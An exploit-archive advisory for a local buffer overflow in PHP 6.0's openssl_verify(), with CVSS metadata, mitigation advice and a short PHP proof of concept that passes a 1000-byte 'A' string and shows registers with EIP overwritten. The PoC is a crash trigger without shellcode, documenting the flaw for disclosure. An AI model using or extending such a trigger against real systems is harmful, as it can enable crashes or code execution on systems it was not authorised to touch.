PHP 6.0 openssl_verify() Local Buffer Overflow PoC

vendor:

PHP 6.0

by:

Pr0T3cT10n

9,3

CVSS

HIGH

Local Buffer Overflow

119

CWE

Product Name: PHP 6.0

Affected Version From: 6.0

Affected Version To: 6.0

Patch Exists: Yes

Related CWE: N/A

CPE: a:php:php:6.0

Metasploit: N/A

Other Scripts: N/A

Tags: N/A

CVSS Metrics: N/A

Nuclei References: N/A

Nuclei Metadata: N/A

Platforms Tested: WIN XP

2009

PHP 6.0 openssl_verify() Local Buffer Overflow PoC

A local buffer overflow vulnerability exists in PHP 6.0 when using the openssl_verify() function. This vulnerability can be exploited by an attacker to execute arbitrary code on the vulnerable system. The vulnerability is triggered when a specially crafted string is passed to the openssl_verify() function. This can lead to a crash of the application or potentially allow an attacker to execute arbitrary code.

Mitigation:

Upgrade to the latest version of PHP 6.0 and apply the latest security patches.

Source

Exploit-DB raw data:

<?php
// ==================================================================================
//
// PHP 6.0 openssl_verify() Local Buffer Overflow PoC
//
// Tested on WIN XP, Apache, PHP 6.0dev. Local Buffer Overflow.
//
// Local Buffer Overflow
// Author: Pr0T3cT10n <pr0t3ct10n@gmail.com>
//
// ==================================================================================
//
// REGISTERS:
// EAX 000003D0, ECX 00BBDB28, EDX 00BBDAD8
// EBX 00BBC940, ESP 0012FB5C UNICODE "AAA...."
// ESI 00BBC940, EDI 00831D00, EBP 0012FBF0 UNICODE "AAA...."
// EIP 00410041
//
// ==================================================================================

$buffer = str_repeat("A", 1000);
openssl_verify(1,1,$buffer);
?>